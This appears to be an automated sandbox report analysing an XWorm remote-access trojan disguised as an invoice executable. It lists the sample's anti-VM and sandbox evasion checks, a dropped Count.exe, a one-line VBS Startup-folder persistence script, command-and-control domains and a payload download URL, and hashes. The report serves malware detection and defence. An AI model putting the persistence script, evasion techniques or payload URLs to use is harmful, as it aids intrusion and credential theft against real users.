Source: C:\Users\user\Desktop\COHC INVOI NO 2500385 .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\COHC INVOI NO 2500385 .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\COHC INVOI NO 2500385 .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\COHC INVOI NO 2500385 .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\COHC INVOI NO 2500385 .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\COHC INVOI NO 2500385 .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\COHC INVOI NO 2500385 .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\COHC INVOI NO 2500385 .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\COHC INVOI NO 2500385 .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\COHC INVOI NO 2500385 .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\COHC INVOI NO 2500385 .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\COHC INVOI NO 2500385 .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\COHC INVOI NO 2500385 .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\COHC INVOI NO 2500385 .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\COHC INVOI NO 2500385 .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\COHC INVOI NO 2500385 .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\COHC INVOI NO 2500385 .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\COHC INVOI NO 2500385 .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\COHC INVOI NO 2500385 .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\COHC INVOI NO 2500385 .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\COHC INVOI NO 2500385 .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\COHC INVOI NO 2500385 .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\COHC INVOI NO 2500385 .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\COHC INVOI NO 2500385 .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\COHC INVOI NO 2500385 .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\COHC INVOI NO 2500385 .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\COHC INVOI NO 2500385 .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\COHC INVOI NO 2500385 .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\COHC INVOI NO 2500385 .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\COHC INVOI NO 2500385 .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\COHC INVOI NO 2500385 .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\COHC INVOI NO 2500385 .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match

File source: Process Memory Space: COHC INVOI NO 2500385 .exe PID: 7828, type: MEMORYSTR

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: COHC INVOI NO 2500385 .exe, 00000000.00000002.1338699571.0000000002ECE000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: SBIEDLL.DLL

Source: C:\Users\user\Desktop\COHC INVOI NO 2500385 .exe	Memory allocated: 2E40000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\COHC INVOI NO 2500385 .exe	Memory allocated: 2EA0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\COHC INVOI NO 2500385 .exe	Memory allocated: 4EA0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\COHC INVOI NO 2500385 .exe	Memory allocated: 1290000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\COHC INVOI NO 2500385 .exe	Memory allocated: 30A0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\COHC INVOI NO 2500385 .exe	Memory allocated: 12D0000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Users\user\Desktop\COHC INVOI NO 2500385 .exe

File Volume queried: C:\ FullSizeInformation

Jump to behavior

Source: COHC INVOI NO 2500385 .exe, 00000000.00000002.1338699571.0000000002ECE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMware\|VIRTUAL\|A M I\|Xen
Source: COHC INVOI NO 2500385 .exe, 00000000.00000002.1338699571.0000000002ECE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Microsoft\|VMWare\|Virtual
Source: COHC INVOI NO 2500385 .exe, 00000000.00000002.1338136818.00000000011EC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\Desktop\COHC INVOI NO 2500385 .exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\COHC INVOI NO 2500385 .exe	Process queried: DebugPort			Jump to behavior
Source: C:\Users\user\Desktop\COHC INVOI NO 2500385 .exe	Process queried: DebugPort			Jump to behavior

Source: C:\Users\user\Desktop\COHC INVOI NO 2500385 .exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Users\user\Desktop\COHC INVOI NO 2500385 .exe	Process token adjusted: Debug			Jump to behavior

Source: C:\Users\user\Desktop\COHC INVOI NO 2500385 .exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

.NET source code references suspicious native API functions

Source: 0.2.COHC INVOI NO 2500385 .exe.4042150.7.raw.unpack, NativeMethods.cs	Reference to suspicious API methods: OpenProcessToken(hProcess, desiredAccess, out var TokenHandle)
Source: 0.2.COHC INVOI NO 2500385 .exe.4042150.7.raw.unpack, ResourceReferenceValue.cs	Reference to suspicious API methods: NativeMethods.LoadLibrary(ResourceFilePath)
Source: 0.2.COHC INVOI NO 2500385 .exe.2fe4690.0.raw.unpack, Messages.cs	Reference to suspicious API methods: capGetDriverDescriptionA(wDriver, ref lpszName, 100, ref lpszVer, 100)

Source: C:\Users\user\Desktop\COHC INVOI NO 2500385 .exe

Process created: C:\Users\user\Desktop\COHC INVOI NO 2500385 .exe "C:\Users\user\Desktop\COHC INVOI NO 2500385 .exe"

Jump to behavior

Source: C:\Users\user\Desktop\COHC INVOI NO 2500385 .exe	Queries volume information: C:\Users\user\Desktop\COHC INVOI NO 2500385 .exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\COHC INVOI NO 2500385 .exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\COHC INVOI NO 2500385 .exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\COHC INVOI NO 2500385 .exe	Queries volume information: C:\Users\user\Desktop\COHC INVOI NO 2500385 .exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\COHC INVOI NO 2500385 .exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\COHC INVOI NO 2500385 .exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected XWorm

Source: Yara match	File source: 0.2.COHC INVOI NO 2500385 .exe.2fe4690.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.COHC INVOI NO 2500385 .exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.COHC INVOI NO 2500385 .exe.2fe4690.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000007.00000002.2448321976.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1338699571.0000000003487000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1338699571.0000000002ECE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: COHC INVOI NO 2500385 .exe PID: 7828, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: COHC INVOI NO 2500385 .exe PID: 1136, type: MEMORYSTR

Remote Access Functionality

Yara detected XWorm

Source: Yara match	File source: 0.2.COHC INVOI NO 2500385 .exe.2fe4690.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.COHC INVOI NO 2500385 .exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.COHC INVOI NO 2500385 .exe.2fe4690.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000007.00000002.2448321976.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1338699571.0000000003487000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1338699571.0000000002ECE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: COHC INVOI NO 2500385 .exe PID: 7828, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: COHC INVOI NO 2500385 .exe PID: 1136, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	1 Scripting	Valid Accounts	1 Scheduled Task/Job	1 Scripting	11 Process Injection	1 Masquerading	OS Credential Dumping	211 Security Software Discovery	Remote Services	11 Archive Collected Data	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Native API	1 Scheduled Task/Job	1 Scheduled Task/Job	2 Virtualization/Sandbox Evasion	LSASS Memory	2 Virtualization/Sandbox Evasion	Remote Desktop Protocol	Data from Removable Media	1 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	2 Registry Run Keys / Startup Folder	2 Registry Run Keys / Startup Folder	1 Disable or Modify Tools	Security Account Manager	1 Process Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	2 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	1 DLL Side-Loading	1 DLL Side-Loading	11 Process Injection	NTDS	13 System Information Discovery	Distributed Component Object Model	Input Capture	12 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Deobfuscate/Decode Files or Information	LSA Secrets	Internet Connection Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	11 Obfuscated Files or Information	Cached Domain Credentials	Wi-Fi Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	2 Software Packing	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 DLL Side-Loading	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
COHC INVOI NO 2500385 .exe	36%	Virustotal		Browse
COHC INVOI NO 2500385 .exe	37%	ReversingLabs	Win32.Trojan.Generic
COHC INVOI NO 2500385 .exe	100%	Avira	HEUR/AGEN.1308645

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Roaming\Count.exe	100%	Avira	HEUR/AGEN.1308645
C:\Users\user\AppData\Roaming\Count.exe	37%	ReversingLabs	Win32.Trojan.Generic

Source	Detection	Scanner	Label
http://dr16899.ydns.eu	0%	Avira URL Cloud	safe
http://dr16899.ydns.eu/1/12/panel/uploads/Hggvtg.mp3	0%	Avira URL Cloud	safe
bich23.ydns.eu	0%	Avira URL Cloud	safe
http://dr16899.ydns.eu/1/12/panel/uploads/Hggvtg.mp3Yd3/t6WgCmxQaSXEOKTneeXNZHS1DgBbPFIgkjoFZ3y4=1X4	0%	Avira URL Cloud	safe
officialtrmmy.ydns.eu	0%	Avira URL Cloud	safe
sdremm.ydns.eu	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
dr16899.ydns.eu	45.144.214.104	true	false		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
bich23.ydns.eu	true	Avira URL Cloud: safe	unknown
http://dr16899.ydns.eu/1/12/panel/uploads/Hggvtg.mp3	false	Avira URL Cloud: safe	unknown
officialtrmmy.ydns.eu	true	Avira URL Cloud: safe	unknown
sdremm.ydns.eu	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://github.com/mgravell/protobuf-neti	COHC INVOI NO 2500385 .exe, 00000000.00000002.1348558410.0000000003EA8000.00000004.00000800.00020000.00000000.sdmp, COHC INVOI NO 2500385 .exe, 00000000.00000002.1352524201.00000000064E0000.00000004.08000000.00040000.00000000.sdmp, COHC INVOI NO 2500385 .exe, 00000000.00000002.1348558410.0000000003FAC000.00000004.00000800.00020000.00000000.sdmp	false		high
https://stackoverflow.com/q/14436606/23354	COHC INVOI NO 2500385 .exe, 00000000.00000002.1338699571.0000000002ECE000.00000004.00000800.00020000.00000000.sdmp, COHC INVOI NO 2500385 .exe, 00000000.00000002.1348558410.0000000003EA8000.00000004.00000800.00020000.00000000.sdmp, COHC INVOI NO 2500385 .exe, 00000000.00000002.1352524201.00000000064E0000.00000004.08000000.00040000.00000000.sdmp, COHC INVOI NO 2500385 .exe, 00000000.00000002.1348558410.0000000003FAC000.00000004.00000800.00020000.00000000.sdmp	false		high
https://github.com/mgravell/protobuf-netJ	COHC INVOI NO 2500385 .exe, 00000000.00000002.1348558410.0000000003EA8000.00000004.00000800.00020000.00000000.sdmp, COHC INVOI NO 2500385 .exe, 00000000.00000002.1352524201.00000000064E0000.00000004.08000000.00040000.00000000.sdmp, COHC INVOI NO 2500385 .exe, 00000000.00000002.1348558410.0000000003FAC000.00000004.00000800.00020000.00000000.sdmp	false		high
http://dr16899.ydns.eu	COHC INVOI NO 2500385 .exe, 00000000.00000002.1338699571.0000000002EA1000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://stackoverflow.com/q/11564914/23354;	COHC INVOI NO 2500385 .exe, 00000000.00000002.1348558410.0000000003EA8000.00000004.00000800.00020000.00000000.sdmp, COHC INVOI NO 2500385 .exe, 00000000.00000002.1352524201.00000000064E0000.00000004.08000000.00040000.00000000.sdmp, COHC INVOI NO 2500385 .exe, 00000000.00000002.1348558410.0000000003FAC000.00000004.00000800.00020000.00000000.sdmp	false		high
https://stackoverflow.com/q/2152978/23354	COHC INVOI NO 2500385 .exe, 00000000.00000002.1348558410.0000000003EA8000.00000004.00000800.00020000.00000000.sdmp, COHC INVOI NO 2500385 .exe, 00000000.00000002.1352524201.00000000064E0000.00000004.08000000.00040000.00000000.sdmp, COHC INVOI NO 2500385 .exe, 00000000.00000002.1348558410.0000000003FAC000.00000004.00000800.00020000.00000000.sdmp	false		high
https://github.com/mgravell/protobuf-net	COHC INVOI NO 2500385 .exe, 00000000.00000002.1348558410.0000000003EA8000.00000004.00000800.00020000.00000000.sdmp, COHC INVOI NO 2500385 .exe, 00000000.00000002.1352524201.00000000064E0000.00000004.08000000.00040000.00000000.sdmp, COHC INVOI NO 2500385 .exe, 00000000.00000002.1348558410.0000000003FAC000.00000004.00000800.00020000.00000000.sdmp	false		high
http://dr16899.ydns.eu/1/12/panel/uploads/Hggvtg.mp3Yd3/t6WgCmxQaSXEOKTneeXNZHS1DgBbPFIgkjoFZ3y4=1X4	COHC INVOI NO 2500385 .exe, Count.exe.0.dr	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	COHC INVOI NO 2500385 .exe, 00000000.00000002.1338699571.0000000002EA1000.00000004.00000800.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
45.144.214.104	dr16899.ydns.eu	Ukraine		47169	HPC-MVM-ASHU	false

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1633338
Start date and time:	2025-03-10 09:02:14 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 5m 36s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	14
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	COHC INVOI NO 2500385 .exe
Detection:	MAL
Classification:	mal100.troj.expl.evad.winEXE@4/3@1/1
EGA Information:	Failed
HCA Information:	Successful, ratio: 80% Number of executed functions: 46 Number of non-executed functions: 7
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WerFault.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 23.199.214.10, 4.245.163.56
Excluded domains from analysis (whitelisted): fs.microsoft.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, c.pki.goog, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target COHC INVOI NO 2500385 .exe, PID 1136 because it is empty
Execution Graph export aborted for target COHC INVOI NO 2500385 .exe, PID 7828 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
08:03:27	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Count.vbs

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
45.144.214.104	PO#GREEN AURA.exe	Get hash	malicious	XWorm	Browse	win32.ydns.eu/1/12/panel/uploads/Xlzsats.wav
	pictures and specifications.exe	Get hash	malicious	XWorm	Browse	win32.ydns.eu/never/lookinto/it/panel/uploads/Qwprueqkjqe.mp3
	Bestellbest#U00e4tigung.exe	Get hash	malicious	XWorm	Browse	win32.ydns.eu/never/lookinto/it/panel/uploads/Rieukcp.pdf
	FFDOC-2025210 pdf.exe	Get hash	malicious	XWorm	Browse	win32.ydns.eu/never/lookinto/it/panel/uploads/Ptcugze.mp3
	UPS tracking details.exe	Get hash	malicious	PureLog Stealer, XWorm	Browse	win32.ydns.eu/never/lookinto/it/panel/uploads/Fjuzaw.pdf
	Enquiry#039855.exe	Get hash	malicious	XWorm	Browse	win32.ydns.eu/never/lookinto/it/panel/uploads/Tnemxaef.vdf

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
HPC-MVM-ASHU	jklx86.elf	Get hash	malicious	Unknown	Browse	45.131.150.222
	esFK2gm.exe	Get hash	malicious	Fallen Miner, Xmrig	Browse	45.144.212.77
	yjYJ8QncaF.exe	Get hash	malicious	Fallen Miner, Xmrig	Browse	45.144.212.77
	cbr.ppc.elf	Get hash	malicious	Mirai	Browse	45.131.150.227
	PO#GREEN AURA.exe	Get hash	malicious	XWorm	Browse	45.144.214.104
	pictures and specifications.exe	Get hash	malicious	XWorm	Browse	45.144.214.104
	Bestellbest#U00e4tigung.exe	Get hash	malicious	XWorm	Browse	45.144.214.104
	FFDOC-2025210 pdf.exe	Get hash	malicious	XWorm	Browse	45.144.214.104
	nklarm.elf	Get hash	malicious	Unknown	Browse	45.131.150.251
	UPS tracking details.exe	Get hash	malicious	PureLog Stealer, XWorm	Browse	45.144.214.104

Process:	C:\Users\user\Desktop\COHC INVOI NO 2500385 .exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	16384
Entropy (8bit):	5.450469866551495
Encrypted:	false
SSDEEP:	384:PsYaVj6St8DqB7od9aUle4Ct351dmTtzLW4zAT9p6jClBTo:hUj6xQ7w9Dw6CH
MD5:	31F1E66669C6784C4BAAE3C060A8C662
SHA1:	B05BE0F311FC157E8321F0DA93377BAE4687193A
SHA-256:	2E026A7538A02673CB6D0F7B3592C08D35A9A00CC94C553A7AC17A93533D81CD
SHA-512:	BF89850E0FDB9CA03EB891D85CDF4B627E56B35D836577FAFA4A05E7383243E67C5870DC2F3094AFFDA25DCF96C53F5D86491418DE0FD3B2BA097D4328CA7E7A
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: ReversingLabs, Detection: 37%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....i.g.................6...........U... ...`....@.. ....................................`..................................U..W....`............................................................................... ............... ..H............text....5... ...6.................. ..`.rsrc........`.......8..............@..@.reloc...............>..............@..B.................U......H.......................................................................(......{...."..}......{...."..}......{...."..}......{...."..}......{...."..}......{...."..}......{...."..}......{...."..}......{...."..}......{...."..}....J.s....}.....(....F.{....o ..........(!...6.{.....o"...2.{....o#.....s....>..(...+..(,...&...s-...&...s...."..s=...N.......+s?...(...+..o@...j...o.....o.....o....(A...^.....(B....{.....o...V.(......}E.....}F...*..{E

C:\Users\user\AppData\Roaming\Count.exe:Zone.Identifier

Download File

Process:	C:\Users\user\Desktop\COHC INVOI NO 2500385 .exe
File Type:	ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Reputation:	high, very likely benign file
Preview:	[ZoneTransfer]....ZoneId=0

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Count.vbs

Download File

Process:	C:\Users\user\Desktop\COHC INVOI NO 2500385 .exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	80
Entropy (8bit):	4.700070520364181
Encrypted:	false
SSDEEP:	3:FER/n0eFHHot+kiEaKC5yjn:FER/lFHIwknaZ5s
MD5:	B7B6811983F114787E6D28702308C6F2
SHA1:	5BA48CB2DD40DB58FD9C48B2102B676A04F2C35E
SHA-256:	971C112651121F94A06C1536F27F815FDC9A8E95973BFE1CEEBF8B16786FAD98
SHA-512:	A50BACE60CCCD25F0DDA9F859FBFD2EC2F0CA1AE9AAE4A4F8BEC459664DEB278EBDE233D5A527FD268A2AEDC046DDC509E7B171F45ED97E2DEE186C4E5537FBF
Malicious:	true
Reputation:	low
Preview:	CreateObject("WScript.Shell").Run """C:\Users\user\AppData\Roaming\Count.exe"""

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	5.450469866551495
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.83% Win32 Executable (generic) a (10002005/4) 49.78% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01%
File name:	COHC INVOI NO 2500385 .exe
File size:	16'384 bytes
MD5:	31f1e66669c6784c4baae3c060a8c662
SHA1:	b05be0f311fc157e8321f0da93377bae4687193a
SHA256:	2e026a7538a02673cb6d0f7b3592c08d35a9a00cc94c553a7ac17a93533d81cd
SHA512:	bf89850e0fdb9ca03eb891d85cdf4b627e56b35d836577fafa4a05e7383243e67c5870dc2f3094affda25dcf96c53f5d86491418de0fd3b2ba097d4328ca7e7a
SSDEEP:	384:PsYaVj6St8DqB7od9aUle4Ct351dmTtzLW4zAT9p6jClBTo:hUj6xQ7w9Dw6CH
TLSH:	F87208046B9C6337C4A6477968B263800AF0D2D6BA43CF5EEDD4665E5C47B460C732FA
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....i.g.................6...........U... ...`....@.. ....................................`................................

File Icon


Icon Hash:	90cececece8e8eb0

Static PE Info

General

Entrypoint:	0x4055de
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x67CE69FE [Mon Mar 10 04:26:38 2025 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
